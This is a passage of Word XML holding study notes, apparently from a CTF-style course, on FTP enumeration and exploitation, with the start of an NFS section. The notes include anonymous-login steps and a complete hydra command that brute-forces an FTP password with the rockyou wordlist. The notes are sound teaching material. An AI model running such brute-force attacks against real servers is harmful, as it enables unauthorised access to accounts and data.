      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>How does FTP work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2022E1AD" w14:textId="157C3620" w:rsidR="00790103" w:rsidRPr="0084205E" w:rsidRDefault="00790103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Uses two channels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59352B56" w14:textId="2BF68BD5" w:rsidR="00790103" w:rsidRPr="0084205E" w:rsidRDefault="00790103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Command/control channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F3BFA" w14:textId="074D8267" w:rsidR="00790103" w:rsidRPr="0084205E" w:rsidRDefault="00790103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Data channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43906C54" w14:textId="12910D00" w:rsidR="00790103" w:rsidRPr="0084205E" w:rsidRDefault="00790103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Active versus Passive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AC66DB" w14:textId="1A53A331" w:rsidR="00790103" w:rsidRPr="0084205E" w:rsidRDefault="00790103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Active allows client to open a port and listen. Server is required to actively connect to it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A8559C" w14:textId="6D462966" w:rsidR="00790103" w:rsidRPr="0084205E" w:rsidRDefault="00790103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Passive allows server to open a port and listen and the client connects to it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AF2BB6" w14:textId="43995B9C" w:rsidR="00790103" w:rsidRPr="0084205E" w:rsidRDefault="00790103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumerating FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5C4E27" w14:textId="74A68715" w:rsidR="00790103" w:rsidRPr="0084205E" w:rsidRDefault="00790103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Nmap to assist in the exploitation of an anonymous FTP login</w:t>
      </w:r>
      <w:r w:rsidR="000125F0" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to search for files that can assist in insertion of reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33991F86" w14:textId="25A61297" w:rsidR="000125F0" w:rsidRPr="0084205E" w:rsidRDefault="000125F0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Common for CTF challenges as it mimics realistic faulty implementation of FTP servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F240345" w14:textId="352327C4" w:rsidR="000125F0" w:rsidRPr="0084205E" w:rsidRDefault="000125F0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Need ftp client on attacking machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B96937" w14:textId="5C407E65" w:rsidR="000125F0" w:rsidRPr="0084205E" w:rsidRDefault="000125F0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Alternative Enumeration Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313DCE98" w14:textId="7295498F" w:rsidR="000125F0" w:rsidRPr="0084205E" w:rsidRDefault="000125F0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Some vulnerable versions of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>in.ftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and other FTP server variants, each of which return different responses to “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” command for home directories which do and don’t exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6433EAFC" w14:textId="70BB88A3" w:rsidR="000125F0" w:rsidRPr="0084205E" w:rsidRDefault="000125F0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” can be issued before authentication, assisting in recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6575B63F" w14:textId="3C455B74" w:rsidR="000125F0" w:rsidRPr="0084205E" w:rsidRDefault="000125F0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>More common in legacy FTP versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD2516C" w14:textId="539AE25E" w:rsidR="00812DE7" w:rsidRPr="0084205E" w:rsidRDefault="00812DE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Access syntax: ftp &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">&gt;, then enter user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>anonymouse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and no password when prompted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EB0C02" w14:textId="6DA165F3" w:rsidR="00812DE7" w:rsidRPr="0084205E" w:rsidRDefault="00812DE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Access directory and use get command to retrieve files and save info on attacking computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D108D2" w14:textId="4EEE1152" w:rsidR="00812DE7" w:rsidRPr="0084205E" w:rsidRDefault="00812DE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploiting FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1B5B6C" w14:textId="419CF6E6" w:rsidR="00812DE7" w:rsidRPr="0084205E" w:rsidRDefault="00812DE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Types of FTP Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB8AE32" w14:textId="79B0168B" w:rsidR="00812DE7" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Command and data channels are unencrypted, as with Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735DBAA5" w14:textId="4F2EE892" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>MiTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559CF89D" w14:textId="185033E0" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ARP-poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E2D657" w14:textId="3BF64342" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Weak or default password configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717F0680" w14:textId="298F26A9" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Method Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CAE01B" w14:textId="43D2B700" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumeration reveals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C3482E" w14:textId="0B3AE035" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>FTP server running on machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB81297" w14:textId="63D78683" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Possible username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E502AED" w14:textId="7D3DE7F7" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> via hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF8E57E" w14:textId="26033B56" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6508106E" w14:textId="55A4E0A6" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Syntax: hydra -t 4 -l &lt;username&gt; -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/wordlists/rockyou.txt -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>vV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt; ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D517F" w14:textId="2BF0EA2F" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hydra – runs tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5454D42E" w14:textId="06862B46" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-t 4 – number of parallel connections per target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6436C7A9" w14:textId="1F7C6EA1" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-l [user] – points to user account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8F9416" w14:textId="2FA55C39" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">-P – path to wordlist dictionary for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75CFB545" w14:textId="3333AD4B" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>vV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – verbose set to very verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608BF09C" w14:textId="74402708" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">&gt; - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> of target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C266467" w14:textId="3D9D1FF3" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ftp/protocol – sets protocol hydra is to use (can be one of 50 protocols)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDF6FAA" w14:textId="5131316E" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>will reveal password if found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674238E7" w14:textId="771AAFAD" w:rsidR="00487FC1" w:rsidRPr="0084205E" w:rsidRDefault="00487FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>use ftp&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">&gt; and login info to access compromised user, navigate as usual, </w:t>
      </w:r>
      <w:r w:rsidR="007C1C82" w:rsidRPr="0084205E">
        <w:t>use get command to retrieve info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D26B12" w14:textId="4E56BE91" w:rsidR="007C1C82" w:rsidRPr="0084205E" w:rsidRDefault="007C1C82" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="183A64A4" w14:textId="6A14DB1D" w:rsidR="007C1C82" w:rsidRPr="0084205E" w:rsidRDefault="005D090D" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Network Services Part 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D26C831" w14:textId="7257527C" w:rsidR="005D090D" w:rsidRPr="0084205E" w:rsidRDefault="00E6689F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Understanding NFS</w:t>
      </w:r>
      <w:r w:rsidR="000556E9" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – ports 2049 (NSFV4/V3), 111 (RPC via NSFV3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D222C6" w14:textId="6CBB33B1" w:rsidR="00E6689F" w:rsidRPr="0084205E" w:rsidRDefault="00E6689F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Network File System – allows system to share directories and files with others over a network</w:t>
      </w:r>
      <w:r w:rsidR="00114DAB" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – files mounted on a server for local-like access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BAF320" w14:textId="24ADE676" w:rsidR="00114DAB" w:rsidRPr="0084205E" w:rsidRDefault="00114DAB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>NFS Workings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6EF703" w14:textId="16D1BDFE" w:rsidR="00114DAB" w:rsidRPr="0084205E" w:rsidRDefault="00114DAB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Client requests to mount a directory from a remote host on a local directory – mount service then acts to connect to the relevant mount daemon using RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07726602" w14:textId="0D840F21" w:rsidR="00114DAB" w:rsidRPr="0084205E" w:rsidRDefault="00114DAB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Server checks if user has permission to mount whatever directory has been requested </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> then return a file handle to unique ID each file and directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E450ECD" w14:textId="02303951" w:rsidR="00114DAB" w:rsidRPr="0084205E" w:rsidRDefault="00114DAB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
